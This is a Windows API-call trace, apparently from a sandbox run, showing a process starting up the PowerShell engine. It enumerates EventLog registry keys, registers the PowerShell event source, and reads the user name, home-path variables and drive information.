	[0112.320] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x368) returned 0x0
	[0112.320] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x0) returned 0x2
	[0112.320] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x36c) returned 0x0
	[0112.320] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x0) returned 0x2
	[0112.320] RegOpenKeyExW (in: hKey=0x358, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x370) returned 0x0
	[0112.320] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x0) returned 0x2
	[0112.326] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x374) returned 0x0
	[0112.326] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x0) returned 0x2
	[0112.326] RegOpenKeyExW (in: hKey=0x358, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x378) returned 0x0
	[0112.326] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x0) returned 0x2
	[0112.327] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x37c) returned 0x0
	[0112.327] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x380) returned 0x0
	[0112.327] RegCloseKey (hKey=0x380) returned 0x0
	[0112.327] RegCloseKey (hKey=0x358) returned 0x0
	[0112.328] RegCloseKey (hKey=0x37c) returned 0x0
	[0112.329] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd128 | out: phkResult=0xcd128*=0x37c) returned 0x0
	[0112.329] RegQueryInfoKeyW (in: hKey=0x37c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd09c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd098, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd09c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd098*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0112.329] CoTaskMemFree (pv=0x0) 
	[0112.329] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.329] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x0, lpName=0x1cf910, lpcchName=0xcd128, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xcd128, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0112.329] CoTaskMemFree (pv=0x1cf910) 
	[0112.329] CoTaskMemFree (pv=0x0) 
	[0112.329] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.330] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x1, lpName=0x1cf910, lpcchName=0xcd128, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xcd128, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0112.330] CoTaskMemFree (pv=0x1cf910) 
	[0112.330] CoTaskMemFree (pv=0x0) 
	[0112.330] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.330] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x2, lpName=0x1cf910, lpcchName=0xcd128, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xcd128, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0112.330] CoTaskMemFree (pv=0x1cf910) 
	[0112.330] CoTaskMemFree (pv=0x0) 
	[0112.330] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.330] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x3, lpName=0x1cf910, lpcchName=0xcd128, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xcd128, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0112.330] CoTaskMemFree (pv=0x1cf910) 
	[0112.330] CoTaskMemFree (pv=0x0) 
	[0112.330] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.330] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x4, lpName=0x1cf910, lpcchName=0xcd128, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xcd128, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0112.330] CoTaskMemFree (pv=0x1cf910) 
	[0112.330] CoTaskMemFree (pv=0x0) 
	[0112.330] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.330] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x5, lpName=0x1cf910, lpcchName=0xcd128, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xcd128, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0112.330] CoTaskMemFree (pv=0x1cf910) 
	[0112.330] CoTaskMemFree (pv=0x0) 
	[0112.330] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.330] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x6, lpName=0x1cf910, lpcchName=0xcd128, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xcd128, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0112.330] CoTaskMemFree (pv=0x1cf910) 
	[0112.331] CoTaskMemFree (pv=0x0) 
	[0112.331] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.331] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x7, lpName=0x1cf910, lpcchName=0xcd128, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xcd128, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0112.331] CoTaskMemFree (pv=0x1cf910) 
	[0112.331] CoTaskMemFree (pv=0x0) 
	[0112.331] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.331] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x8, lpName=0x1cf910, lpcchName=0xcd128, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xcd128, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0112.331] CoTaskMemFree (pv=0x1cf910) 
	[0112.331] CoTaskMemFree (pv=0x0) 
	[0112.331] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x358) returned 0x0
	[0112.331] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x0) returned 0x2
	[0112.331] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x380) returned 0x0
	[0112.331] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x0) returned 0x2
	[0112.331] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x384) returned 0x0
	[0112.331] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x0) returned 0x2
	[0112.332] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x388) returned 0x0
	[0112.332] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x0) returned 0x2
	[0112.332] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x38c) returned 0x0
	[0112.332] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x0) returned 0x2
	[0112.332] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x390) returned 0x0
	[0112.332] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x0) returned 0x2
	[0112.332] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x394) returned 0x0
	[0112.332] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x0) returned 0x2
	[0112.333] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x398) returned 0x0
	[0112.333] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x0) returned 0x2
	[0112.333] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x39c) returned 0x0
	[0112.333] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x3a0) returned 0x0
	[0112.333] RegCloseKey (hKey=0x3a0) returned 0x0
	[0112.333] RegCloseKey (hKey=0x37c) returned 0x0
	[0112.334] RegCloseKey (hKey=0x39c) returned 0x0
	[0112.335] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd0f8 | out: phkResult=0xcd0f8*=0x39c) returned 0x0
	[0112.335] RegQueryInfoKeyW (in: hKey=0x39c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd06c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd068, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd06c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd068*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0112.335] CoTaskMemFree (pv=0x0) 
	[0112.335] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.335] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x0, lpName=0x1cf910, lpcchName=0xcd0f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xcd0f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0112.335] CoTaskMemFree (pv=0x1cf910) 
	[0112.335] CoTaskMemFree (pv=0x0) 
	[0112.335] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.335] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x1, lpName=0x1cf910, lpcchName=0xcd0f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xcd0f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0112.335] CoTaskMemFree (pv=0x1cf910) 
	[0112.335] CoTaskMemFree (pv=0x0) 
	[0112.335] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.335] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x2, lpName=0x1cf910, lpcchName=0xcd0f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xcd0f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0112.335] CoTaskMemFree (pv=0x1cf910) 
	[0112.335] CoTaskMemFree (pv=0x0) 
	[0112.335] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.335] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x3, lpName=0x1cf910, lpcchName=0xcd0f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xcd0f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0112.335] CoTaskMemFree (pv=0x1cf910) 
	[0112.336] CoTaskMemFree (pv=0x0) 
	[0112.336] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.336] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x4, lpName=0x1cf910, lpcchName=0xcd0f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xcd0f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0112.336] CoTaskMemFree (pv=0x1cf910) 
	[0112.336] CoTaskMemFree (pv=0x0) 
	[0112.336] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.336] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x5, lpName=0x1cf910, lpcchName=0xcd0f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xcd0f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0112.336] CoTaskMemFree (pv=0x1cf910) 
	[0112.336] CoTaskMemFree (pv=0x0) 
	[0112.336] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.336] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x6, lpName=0x1cf910, lpcchName=0xcd0f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xcd0f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0112.336] CoTaskMemFree (pv=0x1cf910) 
	[0112.336] CoTaskMemFree (pv=0x0) 
	[0112.336] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.336] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x7, lpName=0x1cf910, lpcchName=0xcd0f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xcd0f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0112.337] CoTaskMemFree (pv=0x1cf910) 
	[0112.337] CoTaskMemFree (pv=0x0) 
	[0112.337] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.337] RegEnumKeyExW (in: hKey=0x39c, dwIndex=0x8, lpName=0x1cf910, lpcchName=0xcd0f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xcd0f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0112.337] CoTaskMemFree (pv=0x1cf910) 
	[0112.337] CoTaskMemFree (pv=0x0) 
	[0112.337] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd158 | out: phkResult=0xcd158*=0x37c) returned 0x0
	[0112.337] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd158 | out: phkResult=0xcd158*=0x0) returned 0x2
	[0112.337] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd158 | out: phkResult=0xcd158*=0x3a0) returned 0x0
	[0112.337] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd158 | out: phkResult=0xcd158*=0x0) returned 0x2
	[0112.337] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd158 | out: phkResult=0xcd158*=0x3a4) returned 0x0
	[0112.338] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd158 | out: phkResult=0xcd158*=0x0) returned 0x2
	[0112.338] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd158 | out: phkResult=0xcd158*=0x3a8) returned 0x0
	[0112.338] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd158 | out: phkResult=0xcd158*=0x0) returned 0x2
	[0112.338] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd158 | out: phkResult=0xcd158*=0x3ac) returned 0x0
	[0112.338] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd158 | out: phkResult=0xcd158*=0x0) returned 0x2
	[0112.338] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd158 | out: phkResult=0xcd158*=0x3b0) returned 0x0
	[0112.338] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd158 | out: phkResult=0xcd158*=0x0) returned 0x2
	[0112.338] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd158 | out: phkResult=0xcd158*=0x3b4) returned 0x0
	[0112.338] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd158 | out: phkResult=0xcd158*=0x0) returned 0x2
	[0112.339] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd158 | out: phkResult=0xcd158*=0x3b8) returned 0x0
	[0112.339] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd158 | out: phkResult=0xcd158*=0x0) returned 0x2
	[0112.339] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd158 | out: phkResult=0xcd158*=0x3bc) returned 0x0
	[0112.339] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd158 | out: phkResult=0xcd158*=0x3c0) returned 0x0
	[0112.339] RegCloseKey (hKey=0x3c0) returned 0x0
	[0112.339] RegCloseKey (hKey=0x39c) returned 0x0
	[0112.340] RegCloseKey (hKey=0x3bc) returned 0x0
	[0112.344] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b940008
	[0112.357] ReportEventW (hEventLog=0x1b940008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3cfca00*="WSMan", lpRawData=0x3cfc770) returned 1
	[0112.358] CoTaskMemAlloc (cb=0x104) returned 0x1b8471c0
	[0112.358] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8471c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0112.358] CoTaskMemFree (pv=0x1b8471c0) 
	[0112.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0112.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0112.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0112.359] CoTaskMemAlloc (cb=0x804) returned 0x1b0a10
	[0112.359] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b0a10, nSize=0xcd3e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd3e8) returned 0x1
	[0112.360] CoTaskMemFree (pv=0x1b0a10) 
	[0112.360] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.360] GetUserNameW (in: lpBuffer=0x1cf910, pcbBuffer=0xcd428 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd428) returned 1
	[0112.360] CoTaskMemFree (pv=0x1cf910) 
	[0112.360] ReportEventW (hEventLog=0x1b940008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3d01f38*="Alias", lpRawData=0x3d01cc8) returned 1
	[0112.361] CoTaskMemAlloc (cb=0x104) returned 0x1b8471c0
	[0112.361] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8471c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0112.361] CoTaskMemFree (pv=0x1b8471c0) 
	[0112.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0112.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0112.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0112.362] CoTaskMemAlloc (cb=0x804) returned 0x1b0a10
	[0112.362] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b0a10, nSize=0xcd3e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd3e8) returned 0x1
	[0112.363] CoTaskMemFree (pv=0x1b0a10) 
	[0112.363] CoTaskMemAlloc (cb=0x204) returned 0x1cf910
	[0112.363] GetUserNameW (in: lpBuffer=0x1cf910, pcbBuffer=0xcd428 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd428) returned 1
	[0112.363] CoTaskMemFree (pv=0x1cf910) 
	[0112.363] ReportEventW (hEventLog=0x1b940008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3d07530*="Environment", lpRawData=0x3d072c0) returned 1
	[0112.364] CoTaskMemAlloc (cb=0x104) returned 0x1b8471c0
	[0112.364] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8471c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0112.364] CoTaskMemFree (pv=0x1b8471c0) 
	[0112.364] CoTaskMemAlloc (cb=0x104) returned 0x1b8471c0
	[0112.364] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x1b8471c0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0112.364] CoTaskMemFree (pv=0x1b8471c0) 
	[0112.364] CoTaskMemAlloc (cb=0x104) returned 0x1b8471c0
	[0112.364] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x1b8471c0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0112.365] CoTaskMemFree (pv=0x1b8471c0) 
	[0112.365] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0xccf90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0112.365] SetErrorMode (uMode=0x1) returned 0x1
	[0112.365] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0xcd1a0 | out: lpFileInformation=0xcd1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0112.365] SetErrorMode (uMode=0x1) returned 0x1
	[0112.367] GetLogicalDrives () returned 0x4
	[0112.368] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xccd00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0112.369] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0112.369] SetErrorMode (uMode=0x1) returned 0x1
	[0112.370] CoTaskMemAlloc (cb=0x68) returned 0x1b8517e0
	[0112.370] CoTaskMemAlloc (cb=0x68) returned 0x1b851850
